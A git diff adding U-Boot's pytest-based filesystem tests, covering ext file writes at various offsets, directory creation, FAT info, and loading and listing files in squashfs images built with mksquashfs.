+ def test_fs_ext1(self, u_boot_console, fs_obj_ext): + """ + Test Case 1 - write a file with absolute path + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 1 - write with abs path'): + # Test Case 1a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w1 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 1b - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w1' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext2(self, u_boot_console, fs_obj_ext): + """ + Test Case 2 - write to a file with relative path + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 2 - write with rel path'): + # Test Case 2a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x dir1/%s.w2 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 2b - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x dir1/%s.w2' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext3(self, u_boot_console, fs_obj_ext): + """ + Test Case 3 - write to a file with invalid path + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 3 - write with invalid path'): + # Test Case 3 - Check if command expectedly failed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/none/%s.w3 $filesize' + % (fs_type, 
ADDR, MIN_FILE)]) + assert('Unable to write file /dir1/none/' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext4(self, u_boot_console, fs_obj_ext): + """ + Test Case 4 - write at non-zero offset, enlarging file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 4 - write at non-zero offset, enlarging file size'): + # Test Case 4a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w4 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w4 $filesize 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 4b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w4' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=6400' in ''.join(output)) + + # Test Case 4c - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w4' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext5(self, u_boot_console, fs_obj_ext): + """ + Test Case 5 - write at non-zero offset, shrinking file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 5 - write at non-zero offset, shrinking file size'): + # Test Case 5a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w5 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w5 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('5120 bytes written' in output) + + # Test Case 5b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w5' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=2800' in ''.join(output)) + + # Test Case 5c - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w5' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext6(self, u_boot_console, fs_obj_ext): + """ + Test Case 6 - write nothing at the start, truncating to zero + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 6 - write nothing at the start, truncating to zero'): + # Test Case 6a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w6 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w6 0 0' + % (fs_type, ADDR, MIN_FILE)) + assert('0 bytes written' in output) + + # Test Case 6b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w6' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=0' in ''.join(output)) + 
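+ # The 'filesize' values checked in these test cases are hexadecimal, as
+ # printed by printenv; e.g. for the 20480 (0x5000) byte MIN_FILE:
+ #   0x5000 bytes written at offset 0x1400  -> filesize=6400 (Test Case 4)
+ #   0x1400 bytes written at offset 0x1400  -> filesize=2800 (Test Case 5)
+ #   0x5000 bytes appended at offset 0x5000 -> filesize=a000 (Test Case 7)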
assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext7(self, u_boot_console, fs_obj_ext): + """ + Test Case 7 - write at the end (append) + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 7 - write at the end (append)'): + # Test Case 7a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w7 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w7 $filesize $filesize' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 7b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w7' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=a000' in ''.join(output)) + + # Test Case 7c - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w7' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext8(self, u_boot_console, fs_obj_ext): + """ + Test Case 8 - write at offset beyond the end of file + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 8 - write beyond the end'): + # Test Case 8a - Check if command expectedly failed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w8 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w8 0x1400 %x' + % (fs_type, ADDR, MIN_FILE, 0x100000 + 0x1400)) + assert('Unable to write file /dir1' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext9(self, u_boot_console, fs_obj_ext): + """ + Test Case 9 - write to a non-existing file at non-zero offset + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 9 - write to non-existing file with non-zero offset'): + # Test Case 9a - Check if command expectedly failed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w9 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)]) + assert('Unable to write file /dir1' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext10(self, u_boot_console, fs_obj_ext): + """ + 'Test Case 10 - create/delete as many directories under root directory + as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 10 - create/delete (many)'): + # Test Case 10a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. 
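+ # With the 2048-byte cluster assumed above, 2048 / 32 = 64 entries fit in
+ # one cluster, so creating 66 files below is enough to grow the directory
+ # past a single cluster (and deleting them shrinks it back).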
+ output = u_boot_console.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 10b - Delete many files + for i in range(0, 66): + output = u_boot_console.run_command( + '%srm host 0:0 /FILE0123456789_%02x' + % (fs_type, i)) + output = u_boot_console.run_command('%sls host 0:0 /' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 10c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext11(self, u_boot_console, fs_obj_ext): + """ + 'Test Case 11 - create/delete as many directories under non-root + directory as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 11 - create/delete (many)'): + # Test Case 11a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. + output = u_boot_console.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 11b - Delete many files + for i in range(0, 66): + output = u_boot_console.run_command( + '%srm host 0:0 /dir1/FILE0123456789_%02x' + % (fs_type, i)) + output = u_boot_console.run_command('%sls host 0:0 /dir1' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 11c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext12(self, u_boot_console, fs_obj_ext): + """ + Test Case 12 - write plain and mangle file + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 12 - write plain and mangle file'): + # Test Case 12a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, PLAIN_FILE), + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, MANGLE_FILE)]) + assert('0 bytes written' in ''.join(output)) + # Test Case 12b - Read file system content + output = check_output('mdir -i %s' % fs_img, shell=True).decode() + # Test Case 12c - Check if short filename is not mangled + assert(str2fat(PLAIN_FILE) in ''.join(output)) + # Test Case 12d - Check if long filename is mangled + assert(str2fat(MANGLE_FILE) 
in ''.join(output)) + + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_fs_cmd.py b/test/py/tests/test_fs/test_fs_cmd.py new file mode 100644 index 00000000000..700cf3591de --- /dev/null +++ b/test/py/tests/test_fs/test_fs_cmd.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_fstypes(u_boot_console): + """Test that `fstypes` prints a result which includes `sandbox`.""" + output = u_boot_console.run_command('fstypes') + assert "Supported filesystems:" in output + assert "sandbox" in output diff --git a/test/py/tests/test_fs/test_fs_fat.py b/test/py/tests/test_fs/test_fs_fat.py new file mode 100644 index 00000000000..4009d0b63a3 --- /dev/null +++ b/test/py/tests/test_fs/test_fs_fat.py @@ -0,0 +1,25 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2023 Weidmüller Interface GmbH & Co. KG +# Author: Christian Taedcke <christian.taedcke@weidmueller.com> +# +# U-Boot File System: FAT Test + +""" +This test verifies fat specific file system behaviour. +""" + +import pytest +import re + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsFat(object): + def test_fs_fat1(self, u_boot_console, fs_obj_fat): + """Test that `fstypes` prints a result which includes `sandbox`.""" + fs_type,fs_img = fs_obj_fat + with u_boot_console.log.section('Test Case 1 - fatinfo'): + # Test Case 1 - ls + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'fatinfo host 0:0']) + assert(re.search('Filesystem: %s' % fs_type.upper(), ''.join(output))) diff --git a/test/py/tests/test_fs/test_mkdir.py b/test/py/tests/test_fs/test_mkdir.py new file mode 100644 index 00000000000..fa9561ec359 --- /dev/null +++ b/test/py/tests/test_fs/test_mkdir.py @@ -0,0 +1,121 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:mkdir Test + +""" +This test verifies mkdir operation on file system. 
+""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestMkdir(object): + def test_mkdir1(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 1 - create a directory under a root + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 1 - mkdir'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir1/' in ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir1' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + + def test_mkdir2(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 2 - create a directory under a sub-directory + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 2 - mkdir (sub-sub directory)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1/dir2' % fs_type, + '%sls host 0:0 dir1' % fs_type]) + assert('dir2/' in ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir1/dir2' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir3(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 3 - trying to create a directory with a non-existing + path should fail + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 3 - mkdir (non-existing path)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 none/dir3' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir4(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 4 - trying to create "." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 4 - mkdir (".")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 .' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir5(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 5 - trying to create ".." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 5 - mkdir ("..")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 ..' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir6(self, u_boot_console, fs_obj_mkdir): + """ + 'Test Case 6 - create as many directories as amount of directory + entries goes beyond a cluster size)' + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 6 - mkdir (create many)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir6' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir6/' in ''.join(output)) + + for i in range(0, 20): + output = u_boot_console.run_command( + '%smkdir host 0:0 dir6/0123456789abcdef%02x' + % (fs_type, i)) + output = u_boot_console.run_command('%sls host 0:0 dir6' % fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + + output = u_boot_console.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/.' 
% fs_type) + assert('./' in output) + assert('../' in output) + + output = u_boot_console.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/..' % fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_squashfs/sqfs_common.py b/test/py/tests/test_fs/test_squashfs/sqfs_common.py new file mode 100644 index 00000000000..d1621dcce3a --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/sqfs_common.py @@ -0,0 +1,204 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import shutil +import subprocess + +""" standard test images table: Each table item is a key:value pair +representing the output image name and its respective mksquashfs options. +This table should be modified only when adding support for new compression +algorithms. The 'default' case takes no options but the input and output +names, so it must be assigned with an empty string. +""" +STANDARD_TABLE = { + 'default' : '', + 'lzo_comp_frag' : '', + 'lzo_frag' : '', + 'lzo_no_frag' : '', + 'zstd_comp_frag' : '', + 'zstd_frag' : '', + 'zstd_no_frag' : '', + 'gzip_comp_frag' : '', + 'gzip_frag' : '', + 'gzip_no_frag' : '' +} + +""" EXTRA_TABLE: Set this table's keys and values if you want to make squashfs +images with your own customized options. +""" +EXTRA_TABLE = {} + +# path to source directory used to make squashfs test images +SQFS_SRC_DIR = 'sqfs_src_dir' + +def get_opts_list(): + """ Combines fragmentation and compression options into a list of strings. + + opts_list's firts item is an empty string as STANDARD_TABLE's first item is + the 'default' case. + + Returns: + A list of strings whose items are formed by a compression and a + fragmentation option joined by a whitespace. + """ + # supported compression options only + comp_opts = ['-comp lzo', '-comp zstd', '-comp gzip'] + # file fragmentation options + frag_opts = ['-always-use-fragments', '-always-use-fragments -noF', '-no-fragments'] + + opts_list = [' '] + for comp_opt in comp_opts: + for frag_opt in frag_opts: + opts_list.append(' '.join([comp_opt, frag_opt])) + + return opts_list + +def init_standard_table(): + """ Initializes STANDARD_TABLE values. + + STANDARD_TABLE's keys are pre-defined, and init_standard_table() assigns + the right value for each one of them. + """ + opts_list = get_opts_list() + + for key, value in zip(STANDARD_TABLE.keys(), opts_list): + STANDARD_TABLE[key] = value + +def generate_file(file_name, file_size): + """ Generates a file filled with 'x'. + + Args: + file_name: the file's name. + file_size: the content's length and therefore the file size. + """ + content = 'x' * file_size + + file = open(file_name, 'w') + file.write(content) + file.close() + +def generate_sqfs_src_dir(build_dir): + """ Generates the source directory used to make the SquashFS images. + + The source directory is generated at build_dir, and it has the following + structure: + sqfs_src_dir/ + ├── empty-dir/ + ├── f1000 + ├── f4096 + ├── f5096 + ├── subdir/ + │  └── subdir-file + └── sym -> subdir + + 3 directories, 4 files + + The files in the root dir. are prefixed with an 'f' followed by its size. + + Args: + build_dir: u-boot's build-sandbox directory. 
+ """ + + root = os.path.join(build_dir, SQFS_SRC_DIR) + # make root directory + os.makedirs(root) + + # 4096: minimum block size + file_name = 'f4096' + generate_file(os.path.join(root, file_name), 4096) + + # 5096: minimum block size + 1000 chars (fragment) + file_name = 'f5096' + generate_file(os.path.join(root, file_name), 5096) + + # 1000: less than minimum block size (fragment only) + file_name = 'f1000' + generate_file(os.path.join(root, file_name), 1000) + + # sub-directory with a single file inside + subdir_path = os.path.join(root, 'subdir') + os.makedirs(subdir_path) + generate_file(os.path.join(subdir_path, 'subdir-file'), 100) + + # symlink (target: sub-directory) + os.symlink('subdir', os.path.join(root, 'sym')) + + # empty directory + os.makedirs(os.path.join(root, 'empty-dir')) + +def mksquashfs(args): + """ Runs mksquashfs command. + + Args: + args: mksquashfs options (e.g.: compression and fragmentation). + """ + subprocess.run(['mksquashfs ' + args], shell=True, check=True, + stdout=subprocess.DEVNULL) + +def get_mksquashfs_version(): + """ Parses the output of mksquashfs -version. + + Returns: + mksquashfs's version as a float. + """ + out = subprocess.run(['mksquashfs -version'], shell=True, check=True, + capture_output=True, text=True) + # 'out' is: mksquashfs version X (yyyy/mm/dd) ... + return out.stdout.split()[2].split('.')[0:2] + +def check_mksquashfs_version(): + """ Checks if mksquashfs meets the required version. """ + + version = get_mksquashfs_version(); + if int(version[0]) < 4 or int(version[0]) == 4 and int(version[1]) < 4 : + print('Error: mksquashfs is too old, required version: 4.4') + raise AssertionError + +def make_all_images(build_dir): + """ Makes the SquashFS images used in the test suite. + + The image names and respective mksquashfs options are defined in STANDARD_TABLE + and EXTRA_TABLE. The destination is defined by 'build_dir'. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + init_standard_table() + input_path = os.path.join(build_dir, SQFS_SRC_DIR) + + # make squashfs images according to STANDARD_TABLE + for out, opts in zip(STANDARD_TABLE.keys(), STANDARD_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + + # make squashfs images according to EXTRA_TABLE + for out, opts in zip(EXTRA_TABLE.keys(), EXTRA_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + +def clean_all_images(build_dir): + """ Deletes the SquashFS images at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + for image_name in STANDARD_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + + for image_name in EXTRA_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + +def clean_sqfs_src_dir(build_dir): + """ Deletes the source directory at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. 
+ """ + path = os.path.join(build_dir, SQFS_SRC_DIR) + shutil.rmtree(path) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py new file mode 100644 index 00000000000..6ec6ccec6c9 --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py @@ -0,0 +1,154 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import subprocess +import pytest + +from sqfs_common import SQFS_SRC_DIR, STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +@pytest.mark.requiredtool('md5sum') +def original_md5sum(path): + """ Runs md5sum command. + + Args: + path: path to original file. + Returns: + The original file's checksum as a string. + """ + + out = subprocess.run(['md5sum ' + path], shell=True, check=True, + capture_output=True, text=True) + checksum = out.stdout.split()[0] + + return checksum + +def uboot_md5sum(u_boot_console, address, count): + """ Runs U-Boot's md5sum command. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + address: address where the file was loaded (e.g.: $kernel_addr_r). + count: file's size. It was named 'count' to match md5sum's respective + argument name. + Returns: + The checksum of the file loaded with sqfsload as a string. + """ + + out = u_boot_console.run_command('md5sum {} {}'.format(address, count)) + checksum = out.split()[-1] + + return checksum + +def sqfs_load_files(u_boot_console, files, sizes, address): + """ Loads files and asserts their checksums. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + files: list of files to be loaded. + sizes: the sizes of each file. + address: the address where the files should be loaded. + """ + build_dir = u_boot_console.config.build_dir + for (file, size) in zip(files, sizes): + out = u_boot_console.run_command('sqfsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # compare original file's checksum against u-boot's + u_boot_checksum = uboot_md5sum(u_boot_console, address, hex(int(size))) + original_file_path = os.path.join(build_dir, SQFS_SRC_DIR + '/' + file) + original_checksum = original_md5sum(original_file_path) + assert u_boot_checksum == original_checksum + +def sqfs_load_files_at_root(u_boot_console): + """ Calls sqfs_load_files passing the files at the SquashFS image's root. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + + files = ['f4096', 'f5096', 'f1000'] + sizes = ['4096', '5096', '1000'] + address = '$kernel_addr_r' + sqfs_load_files(u_boot_console, files, sizes, address) + +def sqfs_load_files_at_subdir(u_boot_console): + """ Calls sqfs_load_files passing the files at the SquashFS image's subdir. + + This test checks if the path resolution works, since the file is not at the + root directory. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + sqfs_load_files(u_boot_console, files, sizes, address) + +def sqfs_load_non_existent_file(u_boot_console): + """ Calls sqfs_load_files passing an non-existent file to raise an error. 
+ + This test checks if the SquashFS support won't crash if it doesn't find the + specified file. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + address = '$kernel_addr_r' + file = 'non-existent' + out = u_boot_console.run_command('sqfsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def sqfs_run_all_load_tests(u_boot_console): + """ Runs all the previously defined test cases. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + sqfs_load_files_at_root(u_boot_console) + sqfs_load_files_at_subdir(u_boot_console) + sqfs_load_non_existent_file(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +def test_sqfs_load(u_boot_console): + """ Executes the sqfsload test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + build_dir = u_boot_console.config.build_dir + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + u_boot_console.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_load_tests(u_boot_console) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py new file mode 100644 index 00000000000..a20a7d1a663 --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py @@ -0,0 +1,148 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import pytest + +from sqfs_common import STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +def sqfs_ls_at_root(u_boot_console): + """ Runs sqfsls at image's root. + + This test checks if all the present files and directories were listed. Also, + it checks if passing the slash or not changes the output, which it shouldn't. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + + no_slash = u_boot_console.run_command('sqfsls host 0') + slash = u_boot_console.run_command('sqfsls host 0 /') + assert no_slash == slash + + expected_lines = ['empty-dir/', '1000 f1000', '4096 f4096', '5096 f5096', + 'subdir/', '<SYM> sym', '4 file(s), 2 dir(s)'] + + output = u_boot_console.run_command('sqfsls host 0') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_empty_dir(u_boot_console): + """ Runs sqfsls at an empty directory. + + This tests checks if sqfsls will print anything other than the 'Empty directory' + message. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + assert u_boot_console.run_command('sqfsls host 0 empty-dir') == 'Empty directory.' 
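+
+# For reference, sqfs_ls_at_root() above only asserts that the expected
+# substrings appear in the 'sqfsls host 0' output; the full listing looks
+# roughly like this (formatting is illustrative, not asserted):
+#   empty-dir/
+#   1000 f1000
+#   4096 f4096
+#   5096 f5096
+#   subdir/
+#   <SYM> sym
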